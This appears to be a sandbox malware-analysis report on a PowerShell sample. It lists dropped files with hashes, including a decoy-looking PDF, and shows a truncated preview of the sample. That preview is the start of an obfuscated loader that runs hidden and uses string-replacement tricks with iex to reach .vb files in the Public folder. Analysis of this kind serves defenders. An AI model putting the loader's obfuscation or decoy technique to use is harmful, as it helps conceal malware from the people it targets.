                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djk1irbb.meb.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4rkjuie.uwe.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgnpggqy.4jf.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xopxzox1.tww.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-19 06-50-47-772.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393)
                                                                                            Category:dropped
                                                                                            Size (bytes):16525
                                                                                            Entropy (8bit):5.33860678500249
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                                            MD5:C3FEDB046D1699616E22C50131AAF109
                                                                                            SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                                            SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                                            SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                                            Malicious:false
                                                                                            Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):15114
                                                                                            Entropy (8bit):5.324009256143688
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:JRFUdxY+kUm3kL46r9Lp7JWWWFpW03fGPMRgNglN9JRMe3nRNvfwjgRWR8ZUqeVL:qaa
                                                                                            MD5:93AA2707274A69BDDE47481D4564D53E
                                                                                            SHA1:585408211954572D16DFEA77DD8CFAD711EAD7DF
                                                                                            SHA-256:52E843200CBED32E6BF9ED9220D43903CC069D2A323FC2D298542C00A7AAD1E9
                                                                                            SHA-512:905FC9862D59179733CC08911CDAB53A6FEB7C21144A48C8C1D8C9ACA295276932A9F57B30331485C9C4DE7FC8F1DAC41618E6AFCC4947401654C1DDDC89457E
                                                                                            Malicious:false
                                                                                            Preview:SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:790-0500 ThreadID=7628 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5e3ec29e-e4a9-4110-a958-27b5612d1eef.1734609047790 Timestamp=2024-12-19T06:50:47:794-0500 ThreadID=7628 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29752
                                                                                            Entropy (8bit):5.417048843545556
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbasA/A/ADAGATAIADAwA0A5dsAwAw:ceo4+rsCYooc7sBcZ9FZLMdecdgleASz
                                                                                            MD5:825808EA7F1A2BD5CC3775C47A077516
                                                                                            SHA1:61A07D9D0F18994392421EFC302BE8FCFEB1C504
                                                                                            SHA-256:6CD1204F55605E802DC6D54F83FE008B4BF2266419970082BB08189581EA42B1
                                                                                            SHA-512:CE41E0091A378E0A1018FA067FDB7E4332828AB0A3C91DCF5FA3D84D992F5DF33AAF940BEB38A7B071FE29012F911B9CEDDFF2662FCA65B7D295A8097E3373F5
                                                                                            Malicious:false
                                                                                            Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\39a019e1-1527-423a-8495-1913d1400403.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                            Category:dropped
                                                                                            Size (bytes):1419751
                                                                                            Entropy (8bit):7.976496077007677
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
                                                                                            MD5:CA6B0D9F8DDC295DACE8157B69CA7CF6
                                                                                            SHA1:6299B4A49AB28786E7BF75E1481D8011E6022AF4
                                                                                            SHA-256:A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
                                                                                            SHA-512:9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\49ff3d4b-cbd1-41d3-aa01-cb40d6bb1d07.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                            Category:dropped
                                                                                            Size (bytes):386528
                                                                                            Entropy (8bit):7.9736851559892425
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                            Malicious:false
                                                                                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\c1bba825-4252-4ad3-9f05-06d12de32962.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 634912
                                                                                            Category:dropped
                                                                                            Size (bytes):1407294
                                                                                            Entropy (8bit):7.97605879016224
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJi7oW:Jb3mlind9i4ufFXpAXkrfUs0jWLaGZDI
                                                                                            MD5:1B0B46EF76AC75C2C91FA043AFA150CD
                                                                                            SHA1:A8544CE2FC62DFC7AC592F5F567DBE9A623F8410
                                                                                            SHA-256:12B1773B522EE9AEC4F3AACCB353C370F87E2FDBB7D1F5F966DFE04A15F9A398
                                                                                            SHA-512:B0DFAFEDE6CC1DB69F1755F13B58C42BE6260BB1265CCCEA61CAC24CA43AB595E36A0D673FAA92E5BAE979A60DDAD4B4179AB216B6357F487F0752AA88043FE9
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                            C:\Users\user\AppData\Local\Temp\acrocef_low\c45b201c-9ea4-4dec-93af-f251a61cb499.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                            Category:dropped
                                                                                            Size (bytes):758601
                                                                                            Entropy (8bit):7.98639316555857
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                            MD5:3A49135134665364308390AC398006F1
                                                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                            Malicious:false
                                                                                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6222
                                                                                            Entropy (8bit):3.72359745733705
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:PjcCtP82kvhkvCCtpzqhosxHWhqhosjHW9:PjhPtpzqh6hqhM9
                                                                                            MD5:091F8B49493736BC7EE1F7C3602D9C1A
                                                                                            SHA1:9B3F80B84D072F193DC53515DB33D8EB49195696
                                                                                            SHA-256:B43E32DADF2D08E92BD5F707168BEBF9B8D39B3DF2090A8F169C4A58649EAC7B
                                                                                            SHA-512:15949EB10394CD1CB93D974CBE70C072B7B727686CB9EF06AD17C880DE6BBEB5A1485472C5ADC87C015411121147CCF6DEA83D4183A9D8AD544DCEF2625A0708
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ......Yd...2.q2.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......-.R...V.2.R......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YL^..........................d...A.p.p.D.a.t.a...B.V.1......YJ^..Roaming.@......EW)B.YJ^............................5.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YG^............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YG^..........................l|..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YG^....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YG^....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YN^.....0..........

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PVO0NDJOFRDT1QBPSF4T.temp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6222
                                                                                            Entropy (8bit):3.72359745733705
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:PjcCtP82kvhkvCCtpzqhosxHWhqhosjHW9:PjhPtpzqh6hqhM9
                                                                                            MD5:091F8B49493736BC7EE1F7C3602D9C1A
                                                                                            SHA1:9B3F80B84D072F193DC53515DB33D8EB49195696
                                                                                            SHA-256:B43E32DADF2D08E92BD5F707168BEBF9B8D39B3DF2090A8F169C4A58649EAC7B
                                                                                            SHA-512:15949EB10394CD1CB93D974CBE70C072B7B727686CB9EF06AD17C880DE6BBEB5A1485472C5ADC87C015411121147CCF6DEA83D4183A9D8AD544DCEF2625A0708
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ......Yd...2.q2.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......-.R...V.2.R......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YL^..........................d...A.p.p.D.a.t.a...B.V.1......YJ^..Roaming.@......EW)B.YJ^............................5.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.YG^............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.YG^..........................l|..W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.YG^....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.YG^....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.YN^.....0..........

                                                                                            C:\Users\user\Desktop\List of Required items and services.pdf

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                            Category:dropped
                                                                                            Size (bytes):871324
                                                                                            Entropy (8bit):7.827941732382635
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                            MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                            SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                            SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                            SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                            Malicious:false
                                                                                            Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T

                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:ASCII text, with very long lines (841), with no line terminators
                                                                                            Entropy (8bit):5.317412098946815
                                                                                            TrID:
                                                                                              File name:H6epOhxoPY.ps1
                                                                                              File size:841 bytes
                                                                                              MD5:bd912222bc39017ff4cbf8c37d24d889
                                                                                              SHA1:1a4442b9d56c5b3fb06d38009b5f5d01b7a4a809
                                                                                              SHA256:94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6
                                                                                              SHA512:c966243576952bfa7a6c6593450f87a784ad80477c3aea173155b69aa0bcdbe53bd2c45e1b36f495fc6bbd85c6c457a37cb5cde78db4345242f38b2a369319bf
                                                                                              SSDEEP:24:XnQhScjWIjLal1WQWAa6KzLeSv7RrZzo2i:ejKIqlRKzKSvl5of
                                                                                              TLSH:E701568557CA09FB0240F5526CC88579323BDB1D34C504A1FEB8022720BCE3C0EC292E
                                                                                              File Content Preview:powershell -win hidden $np3f8b=iex($('[Environment]::GetEbe3s'''.Replace('be3','nvironmentVariable(''public'') + ''\\lvykjh.vb')));$flol=iex($('[Environment]::GetEbe3s'''.Replace('be3','nvironmentVariable(''public'') + ''\\txr.vb')));function getit([strin

                                                                                              File Icon

                                                                                              Icon Hash:3270d6baae77db44

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

